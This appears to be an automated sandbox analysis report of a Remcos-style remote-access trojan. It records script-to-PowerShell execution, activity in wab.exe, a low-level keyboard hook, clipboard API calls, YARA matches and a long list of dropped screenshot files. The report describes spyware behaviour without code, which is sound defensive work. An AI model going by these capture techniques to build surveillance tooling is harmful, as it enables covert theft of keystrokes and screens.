              Source: wscript.exe, 00000000.00000003.1623206875.000001ABE8874000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623246947.000001ABE8874000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0G
              Source: wscript.exe, 00000000.00000003.1623206875.000001ABE884B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www2.postsignum.cz/crl/psrootqca2.crl01
              Source: powershell.exe, 00000001.00000002.2525142597.000002B7A81D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000005.00000002.2319330594.00000000047C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 00000005.00000002.2320148012.000000000582A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000005.00000002.2320148012.000000000582A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000005.00000002.2320148012.000000000582A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: wscript.exe, 00000000.00000003.1623335324.000001ABE8833000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623298130.000001ABE882E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crl.anf.es/AC/ANFServerCA.crl0
              Source: wscript.exe, 00000000.00000003.1622254049.000001ABE67A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1746252567.000001ABE676E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1624251674.000001ABE88A9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1748409727.000001ABE67A7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1747626632.000001ABE67A3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1747456994.000001ABE6783000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1747117797.000001ABE6783000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
              Source: wscript.exe, 00000000.00000003.1622254049.000001ABE67A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1746252567.000001ABE676E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1624251674.000001ABE88A9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1748409727.000001ABE67A7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1747626632.000001ABE67A3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1747456994.000001ABE6783000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1747117797.000001ABE6783000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
              Source: wscript.exe, 00000000.00000003.1622254049.000001ABE67A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0.
              Source: powershell.exe, 00000005.00000002.2319330594.0000000004919000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000001.00000002.2525142597.000002B7A96E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000001.00000002.2624655236.000002B7C068E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co
              Source: wab.exe, 0000000D.00000003.2474969617.0000000000A01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
              Source: wab.exe, 0000000D.00000003.2478450664.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.2478641943.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2479677849.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.2476480949.0000000000A0E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.2478746986.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.2477359526.0000000000A01000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.2474969617.0000000000A01000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.2476544484.0000000000A0E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.2476284087.0000000000A0E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.2474969617.0000000000A0F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.2478514452.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.2478578223.0000000000A00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
              Source: wab.exeString found in binary or memory: https://login.yahoo.com/config/login
              Source: powershell.exe, 00000001.00000002.2606411580.000002B7B8242000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2320148012.000000000582A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: wscript.exe, 00000000.00000003.1623335324.000001ABE881E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
              Source: wscript.exe, 00000000.00000003.1624174488.000001ABE88BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1622977481.000001ABE88B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623093541.000001ABE88BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rca.e-szigno.hu/ocsp0-
              Source: wscript.exe, 00000000.00000003.1622961066.000001ABE88C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://repository.luxtrust.lu0
              Source: wscript.exe, 00000000.00000003.1623065876.000001ABE88A6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1622991562.000001ABE88A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://repository.tsp.zetes.com0
              Source: wscript.exe, 00000000.00000003.1623065876.000001ABE8887000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.certicamara.com/marco-legal0Z
              Source: wscript.exe, 00000000.00000003.1623335324.000001ABE8833000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623298130.000001ABE882E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.anf.es/AC/ACTAS/789230
              Source: wscript.exe, 00000000.00000003.1623335324.000001ABE8833000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623298130.000001ABE882E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.anf.es/AC/ANFServerCA.crl0
              Source: wscript.exe, 00000000.00000003.1623335324.000001ABE8833000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623298130.000001ABE882E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.anf.es/address/)1(0&
              Source: wscript.exe, 00000000.00000003.1622977481.000001ABE88B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.catcert.net/verarrel
              Source: wscript.exe, 00000000.00000003.1622977481.000001ABE88B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.catcert.net/verarrel05
              Source: wab.exe, wab.exe, 0000000F.00000002.2440006081.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: wab.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
              Source: wscript.exe, 00000000.00000003.1622961066.000001ABE88C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.netlock.hu/docs/
              Source: wscript.exe, 00000000.00000003.1623206875.000001ABE884B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.netlock.net/docs
              Source: wscript.exe, 00000000.00000003.1622977481.000001ABE88B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/0m

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0041183A OpenClipboard,GetLastError,DeleteFileW,13_2_0041183A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,13_2_0040987A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,13_2_004098E2
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,14_2_00406DFC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,14_2_00406E9F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,15_2_004068B5
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,15_2_004072B5

              E-Banking Fraud

              barindex
              Source: Yara matchFile source: 00000009.00000003.2333650972.0000000006604000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

              Spam, unwanted Advertisements and Ransom Demands

              barindex
              Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 entropy: 7.9958487965Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_220403.dat entropy: 7.99919032627Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_200324.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_220505.dat entropy: 7.99908488109Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_200424.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_220605.dat entropy: 7.9989658831Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_200524.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_220706.dat entropy: 7.9989658831Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_200624.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_220806.dat entropy: 7.9989658831Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_200724.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_220908.dat entropy: 7.9989658831Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_200824.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_200924.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_201024.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_201124.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_201224.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_184000.dat entropy: 7.99880459382Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_201324.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_201425.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_201525.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_201625.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_201725.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_201825.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_201925.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_202025.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_202125.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_202225.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_184100.dat entropy: 7.99886726203Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_184200.dat entropy: 7.99891651272Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_184302.dat entropy: 7.99887330465Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_184404.dat entropy: 7.99901786262Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_184504.dat entropy: 7.99897130794Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_202325.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_202425.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_202525.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_202625.dat entropy: 7.99908328258Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_202726.dat entropy: 7.99909450421Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_202827.dat entropy: 7.99909450421Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_202927.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_203027.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_203127.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_203228.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_184614.dat entropy: 7.99895892453Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_184715.dat entropy: 7.99894083885Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_184815.dat entropy: 7.99917817749Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_184915.dat entropy: 7.99909450421Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_185015.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_185115.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_185215.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_185316.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_185417.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_203328.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_203428.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_203528.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_203628.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_203728.dat entropy: 7.99892587233Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_203828.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_203928.dat entropy: 7.99899237099Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_204028.dat entropy: 7.99899237099Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_204128.dat entropy: 7.99899237099Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_204228.dat entropy: 7.99899237099Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_185517.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_185617.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_185718.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_185818.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_185918.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_190018.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_190118.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_190218.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_204328.dat entropy: 7.99899237099Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_204429.dat entropy: 7.99899237099Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_204530.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_204630.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_204730.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_204830.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_204931.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_205031.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_205131.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_205231.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_190318.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_190419.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_190519.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_190619.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_190719.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_190819.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_190919.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_191019.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_191119.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_191219.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_205331.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_205431.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_205531.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_205631.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_205732.dat entropy: 7.99909450421Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_205833.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_205935.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_210035.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_210135.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_210236.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_191319.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_191419.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_191519.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_191620.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_191720.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_191820.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_191920.dat entropy: 7.99908715419Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_192020.dat entropy: 7.99909630829Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_192120.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_192220.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_210336.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_210436.dat entropy: 7.99896090625Jump to dropped file
